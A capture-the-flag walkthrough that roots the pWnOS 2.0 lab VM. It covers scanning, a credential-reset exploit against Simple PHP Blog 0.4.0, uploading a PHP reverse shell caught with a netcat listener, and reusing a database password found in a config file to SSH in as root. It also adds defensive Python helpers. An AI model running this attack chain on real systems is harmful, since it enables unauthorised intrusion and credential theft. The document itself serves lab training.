tl;dr

  • pWnOS:2.0 is a vulnerable VM where the objective is to gain root access on the machine.
  • Simple PHP Blog 0.4.0 - Multiple Remote Exploits (Exploit-DB 1191) is used to reset the blog credentials.
  • A reverse shell file is uploaded to spawn a shell.

Solved by: Jose_v8

It was given that the vulnerable machine has a static IP of 10.10.10.100, so the attacking machine has to be configured with an address inside the 10.10.10.0/24 range.

Initial analysis

The IP of the attacking machine can be set within the specified range as follows. Note that no netmask was given, so ifconfig applied the classful default of 255.0.0.0, as the output shows; for a strict /24 you would add netmask 255.255.255.0.

┌──(kali㉿kali)-[~]
└─$ sudo ifconfig eth0 172.16.190.128 down

┌──(kali㉿kali)-[~]
└─$ sudo ifconfig eth0 10.10.10.101 up

┌──(kali㉿kali)-[~]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.101 netmask 255.0.0.0 broadcast 10.255.255.255
ether 00:0c:29:35:f2:be txqueuelen 1000 (Ethernet)
RX packets 11375 bytes 13158900 (12.5 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 22649 bytes 1817224 (1.7 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 164 bytes 12660 (12.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 164 bytes 12660 (12.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

NMAP

Let's run a basic scan with nmap (-A enables OS detection, version detection and default scripts; -T4 uses faster timing).


┌──(kali㉿kali)-[~]
└─$ nmap -A -T4 10.10.10.100
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-06 07:43 PDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.10.10.100
Host is up (0.00024s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
| 2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_ 256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.2.17 (Ubuntu)
|_http-title: Welcome to this Site!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.74 seconds

From this scan we can see that Apache httpd 2.2.17 is running on port 80 and OpenSSH 5.8p1 on port 22. The script output also notes that the PHPSESSID cookie is set without the HttpOnly flag.

Now we browse to the website hosted on the machine.

[screenshot: 10.10.10.100 site]

Dirb

Now let's run dirb, a web content scanner: it requests every entry of a wordlist against the site to discover files and directories that are not linked from any page.

┌──(kali㉿kali)-[~]
└─$ dirb http://10.10.10.100/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Aug 6 08:52:52 2021
URL_BASE: http://10.10.10.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://10.10.10.100/includes/
+ http://10.10.10.100/index (CODE:200|SIZE:854)
+ http://10.10.10.100/index.php (CODE:200|SIZE:854)
+ http://10.10.10.100/info (CODE:200|SIZE:50175)
+ http://10.10.10.100/info.php (CODE:200|SIZE:50044)
+ http://10.10.10.100/login (CODE:200|SIZE:1174)
+ http://10.10.10.100/register (CODE:200|SIZE:1562)
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)

---- Entering directory: http://10.10.10.100/blog/ ----
+ http://10.10.10.100/blog/add (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/atom (CODE:200|SIZE:1062)
+ http://10.10.10.100/blog/categories (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/comments (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/config/
+ http://10.10.10.100/blog/contact (CODE:200|SIZE:5898)
==> DIRECTORY: http://10.10.10.100/blog/content/
+ http://10.10.10.100/blog/delete (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/docs/
==> DIRECTORY: http://10.10.10.100/blog/flash/
==> DIRECTORY: http://10.10.10.100/blog/images/
+ http://10.10.10.100/blog/index (CODE:200|SIZE:8094)
+ http://10.10.10.100/blog/index.php (CODE:200|SIZE:8094)
+ http://10.10.10.100/blog/info (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/info.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/interface/
==> DIRECTORY: http://10.10.10.100/blog/languages/
+ http://10.10.10.100/blog/login (CODE:200|SIZE:5647)
+ http://10.10.10.100/blog/logout (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/options (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411)
+ http://10.10.10.100/blog/rss (CODE:200|SIZE:1237)
==> DIRECTORY: http://10.10.10.100/blog/scripts/
+ http://10.10.10.100/blog/search (CODE:200|SIZE:4931)
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/static (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/stats (CODE:200|SIZE:5289)
==> DIRECTORY: http://10.10.10.100/blog/themes/
+ http://10.10.10.100/blog/trackback (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0)

---- Entering directory: http://10.10.10.100/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/flash/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/interface/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Fri Aug 6 08:53:05 2021
DOWNLOADED: 9224 - FOUND: 30

From the dirb scan we can see a 'blog' directory, so let's move into it. dirb also warns that several directories, including /includes/, /blog/config/, /blog/content/ and /blog/images/, have directory listing enabled.
Here we can see the page.
[screenshot: blog page]
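As an added example (not part of the original write-up), here is a small Python parser that turns dirb output like the above into exposure findings: directories that dirb reports as listable, and sensitive paths that answer 200. The DIRB_OUTPUT excerpt is constructed from the page's own lines; the SENSITIVE table is my own list of paths worth a second look.

```python
import re
# Excerpt constructed from the dirb output shown above.
DIRB_OUTPUT = """\
+ http://10.10.10.100/info.php (CODE:200|SIZE:50044)
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)
==> DIRECTORY: http://10.10.10.100/blog/config/
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)
---- Entering directory: http://10.10.10.100/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
---- Entering directory: http://10.10.10.100/blog/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
---- Entering directory: http://10.10.10.100/blog/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
"""

HIT_RE = re.compile(r"^\+ (\S+) \(CODE:(\d+)\|SIZE:(\d+)\)")
ENTER_RE = re.compile(r"^---- Entering directory: (\S+) ----")
# Paths worth a second look when they are reachable, with the reason (my own list).
SENSITIVE = {
    "/info.php": "phpinfo() disclosure (PHP version, paths, loaded modules)",
    "/blog/setup": "installer script still deployed",
    "/blog/upgrade": "upgrade script still deployed",
}

def parse_dirb(text):
    """Return (listable_dirs, hits); hits is a list of (url, http_code)."""
    listable, hits, current = [], [], None
    for line in text.splitlines():
        m = HIT_RE.match(line)
        if m:
            hits.append((m.group(1), int(m.group(2))))
            continue
        m = ENTER_RE.match(line)
        if m:
            current = m.group(1)          # remember which directory dirb entered
        elif current and "Directory IS LISTABLE" in line:
            listable.append(current)      # the warning refers to that directory
            current = None
    return listable, hits

def findings(text, base="http://10.10.10.100"):
    """Turn parsed output into human-readable exposure findings."""
    listable, hits = parse_dirb(text)
    out = [f"directory listing enabled: {d}" for d in listable]
    for url, code in hits:
        path = url[len(base):] if url.startswith(base) else url
        if code == 200 and path in SENSITIVE:
            out.append(f"{path} answers 200: {SENSITIVE[path]}")
    return out
```

Redirects such as /blog/setup (302) are deliberately not flagged, since they only show that the script exists behind a login, not that it is reachable.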

Inspecting the page source shows that it runs Simple PHP Blog 0.4.0.

[screenshot: inspected_code]

Exploit

Searching for this version turns up the Exploit-DB entry "Simple PHP Blog 0.4.0 - Multiple Remote Exploits" (1191.pl). Download the exploit and run it.
[screenshot: exploit_db]


┌──(kali㉿kali)-[~/Downloads]
└─$ perl 1191.pl -h http://10.10.10.100/blog -e 3 -U user -P password


SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....


Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: user
Password is set to: password


*** Exploit Completed....
Have a nice day! :)

Option -e 3 selects the "Set New Username and Password" mode: as the output shows, the script deletes ./config/password.txt and recreates it with the username and password given via -U and -P, in this case user and password respectively.

From the current page we can get to a login page, where we enter the username and password we just set.
[screenshot: entering_creds]

Upload reverse shell

After submitting the credentials we are redirected to a page with an Upload Image option.
[screenshot: cred_re-direct]

From that option choose Upload Image and pick the file php-reverse-shell.php from /usr/share/webshells/php.
Edit the file first to set the attacker IP and port number.


┌──(kali㉿kali)-[/]
└─$ cd usr/share/webshells/php

┌──(kali㉿kali)-[/usr/share/webshells/php]
└─$ ls
findsocket php-backdoor.php php-reverse-shell.php qsd-php-backdoor.php reverse-shell.php simple-backdoor.php

[screenshot: find_the_reverse-shell.php]
[screenshot: upload]

Now upload the updated file.

Now start a netcat listener on the port configured in the reverse shell file.


┌──(kali㉿kali)-[~]
└─$ nc -lvp 1234
listening on [any] 1234 ...

After uploading the file, browse to 10.10.10.100/blog/images (listable, as dirb reported) and select the uploaded file; the listener then receives the shell.
[screenshot: select_uploaded_file]

Get root access

┌──(kali㉿kali)-[~]
└─$ nc -lvp 1234
listening on [any] 1234 ...
10.10.10.100: inverse host lookup failed: Host name lookup failure
connect to [10.10.10.101] from (UNKNOWN) [10.10.10.100] 59470
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
22:06:21 up 3:39, 0 users, load average: 0.00, 0.01, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$

Once we have the shell, we find a file mysqli_connect.php in /var that contains a database username and password.

$ cd var
$ ls
backups
cache
crash
index.html
lib
local
lock
log
mail
mysqli_connect.php
opt
run
spool
tmp
uploads
www
$ cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

?>
$
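As an added example (not part of the original write-up), a small Python audit that flags a config file like the one above for the things a defender would want to catch: the application connecting as the MySQL root account, the credential file being world-readable, and the file sitting under a web-served directory. The sample file is constructed with a placeholder password; the password reuse between MySQL and the system root account, which is what actually hands over root here, is a policy failure no file scanner can see.

```python
import os
import re
import stat
import tempfile

# Matches DEFINE ('DB_PASSWORD', '...') in the loose style of the file above
# (case-insensitive, optional space before the parenthesis, single or double quotes).
CRED_RE = re.compile(
    r"""define\s*\(\s*['"](DB_(?:USER|PASSWORD|HOST|NAME))['"]\s*,\s*['"]([^'"]*)['"]\s*\)""",
    re.IGNORECASE,
)

def extract_db_constants(php_source):
    """Return {constant_name: value} for every DB_* constant defined in the source."""
    return dict(CRED_RE.findall(php_source))

def audit_config_file(path, web_roots=("/var/www",)):
    """Return a list of issues for a PHP file that hard-codes DB credentials."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        consts = extract_db_constants(fh.read())
    if "DB_PASSWORD" not in consts:
        return []                      # no credentials here, nothing to audit
    issues = []
    if consts.get("DB_USER") == "root":
        issues.append("application connects to MySQL as root")
    if os.stat(path).st_mode & stat.S_IROTH:
        issues.append("credential file is world-readable")
    real = os.path.realpath(path)
    if any(real.startswith(os.path.realpath(r) + os.sep) for r in web_roots):
        issues.append("credential file lives under a web-served directory")
    return issues

def demo(mode=0o644):
    """Audit a constructed copy of the config (placeholder password, not the real one)."""
    sample = (
        "<?php\n"
        "DEFINE ('DB_USER', 'root');\n"
        "DEFINE ('DB_PASSWORD', 'EXAMPLE-PASSWORD');\n"
        "DEFINE ('DB_HOST', 'localhost');\n"
        "DEFINE ('DB_NAME', 'ch16');\n"
        "?>\n"
    )
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "mysqli_connect.php")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(sample)
        os.chmod(path, mode)           # 0o644 = world-readable, as a careless deploy leaves it
        return audit_config_file(path, web_roots=(tmp,))  # treat tmp as the web root
```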

The database password turns out to be reused for the system root account, so with these credentials we can SSH in as root.

┌──(kali㉿kali)-[~]
└─$ ssh root@10.10.10.100
root@10.10.10.100's password:
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)

* Documentation: http://www.ubuntu.com/server/doc

System information as of Fri Jun 11 22:18:23 EDT 2021

System load: 0.0 Processes: 78
Usage of /: 2.9% of 38.64GB Users logged in: 0
Memory usage: 18% IP address for eth0: 10.10.10.100
Swap usage: 0%

Graph this data and manage this system at https://landscape.canonical.com/
Last login: Mon Jun 7 15:14:22 2021 from 10.10.10.101
root@web:~#
root@web:~# whoami
root
root@web:~#

Now we are the root user XD!